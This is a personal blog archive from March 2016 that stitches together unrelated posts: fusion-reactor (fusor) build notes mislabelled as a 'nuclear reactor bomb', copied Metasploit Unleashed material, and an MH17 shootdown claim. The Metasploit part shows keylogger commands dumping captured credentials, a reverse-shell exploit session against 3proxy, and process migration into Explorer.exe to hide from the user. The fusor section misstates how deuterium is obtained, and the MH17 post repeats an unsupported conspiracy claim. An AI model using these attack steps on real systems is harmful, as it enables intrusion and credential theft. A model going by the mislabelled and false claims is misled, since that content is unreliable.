Wednesday, March 16, 2016

HOW TO MAKE A NUCLEAR REACTOR BOMB ON THE BASEMENT

Two vacuum pumps suck air out of the central chamber, leaving a near-total vacuum. Loose atoms in here interfere with fusion and lower yield.
The chamber is filled with deuterium and jolted with about 45,000 volts of electricity. A negatively charged grid of thin steel wires attracts the now-positive particles, sometimes causing them to collide.
Colliding particles fuse to form helium-3. The resulting neutron emission is measured, proving that fusion occurred



Here are the minimum required materials:

-A vacuum chamber, preferably in a spherical shape

-A roughing vacuum pump capable of reaching at least 75 microns vacuum
-A secondary high vacuum pump, either a turbo pump or oil diffusion pump
-A high voltage supply, preferably capable of at least 40kv 10ma - Must be negative polarity
-A high voltage divider probe for use with a digital multimeter
-A thermocouple or baratron (of appropriate scale) vacuum gauge
-A neutron radiation detector, either a proportional He-3 or BF3 tube with counting instrumentation, or a bubble dosimeter
-A Geiger counter, preferably a scintillator type, for x-ray detection and safety
-Deuterium gas (can be purchased as a gas or extracted from D2O through electrolysis - it is much easier and more effective to use compressed gas)
-A large ballast resistor in the range of 50-100k and at least a foot long
-A camera and TV display for viewing the inside of the reactor
-Lead to shield the camera viewport
-General engineering tools, a machine shop if at all possible (although 90% of mine was built with nothing but a dremel and cordless drill, the only thing you really can't build without a shop is scratch building the vacuum 

chamber)

to extract deuterium is basicly : producible by electrolyzing ordinary tap water with a freshly-charged car battery

http://www.instructables.com/id/Build-A-Fusion-Reactor/

Remote Power Control For Battery Powered Devices

DSCN0517.JPG
Thin conductors on both sides of a thin insulator are connected by wires to a remote switch. Slide it between the batteries. It breaks the connection until the switch is turned on.
http://www.instructables.com/id/Remote-Power-Control-For-Battery-Powered-Devices/

Tuesday, March 15, 2016

malicious Gh0st RAT process

svchost.exe
https://www.offensive-security.com/metasploit-unleashed/keylogging/
Finally, we start the keylogger, wait for some time and dump the output.
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
   tgoogle.cm my credit amex   myusernamthi     amexpasswordpassword

https://www.offensive-security.com/metasploit-unleashed/meterpreter-backdoor/
Using the metsvc backdoor, you can gain a Meterpreter shell at any point.
One word of warning here before we go any further. Metsvc as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, you would either alter the source to require authentication, or filter out remote connections to the port through some other method.
First, we exploit the remote system and migrate to the ‘Explorer.exe’ process in case the user notices the exploited service is not responding and decides to kill it.
msf exploit(3proxy) > exploit

[*] Started reverse handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1983)

meterpreter > ps

Process list
============

    PID   Name                 Path
    ---   ----                 ----
    132   ctfmon.exe           C:\WINDOWS\system32\ctfmon.exe
    176   svchost.exe          C:\WINDOWS\system32\svchost.exe
    440   VMwareService.exe    C:\Program Files\VMware\VMware Tools\VMwareService.exe
    632   Explorer.EXE         C:\WINDOWS\Explorer.EXE
    796   smss.exe             \SystemRoot\System32\smss.exe
    836   VMwareTray.exe       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    844   VMwareUser.exe       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    884   csrss.exe            \??\C:\WINDOWS\system32\csrss.exe
    908   winlogon.exe         \??\C:\WINDOWS\system32\winlogon.exe
    952   services.exe         C:\WINDOWS\system32\services.exe
    964   lsass.exe            C:\WINDOWS\system32\lsass.exe
    1120  vmacthlp.exe         C:\Program Files\VMware\VMware Tools\vmacthlp.exe
    1136  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1236  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1560  alg.exe              C:\WINDOWS\System32\alg.exe
    1568  WZCSLDR2.exe         C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
    1596  jusched.exe          C:\Program Files\Java\jre6\bin\jusched.exe
    1656  msmsgs.exe           C:\Program Files\Messenger\msmsgs.exe
    1748  spoolsv.exe          C:\WINDOWS\system32\spoolsv.exe
    1928  jqs.exe              C:\Program Files\Java\jre6\bin\jqs.exe
    2028  snmp.exe             C:\WINDOWS\System32\snmp.exe
    2840  3proxy.exe           C:\3proxy\bin\3proxy.exe
    3000  mmc.exe              C:\WINDOWS\system32\mmc.exe

meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.

Saturday, March 12, 2016


This image shows what appears to be a fighter jet firing a missile at Malaysia Airlines Flight MH17 from a distance of about 700 meters (2,300 feet). The Boeing aircraft is about 209 feet long with a wingspan of 200 feet. The fighter jet is about 11 times the length of the Boeing away.

http://www.bollyn.com/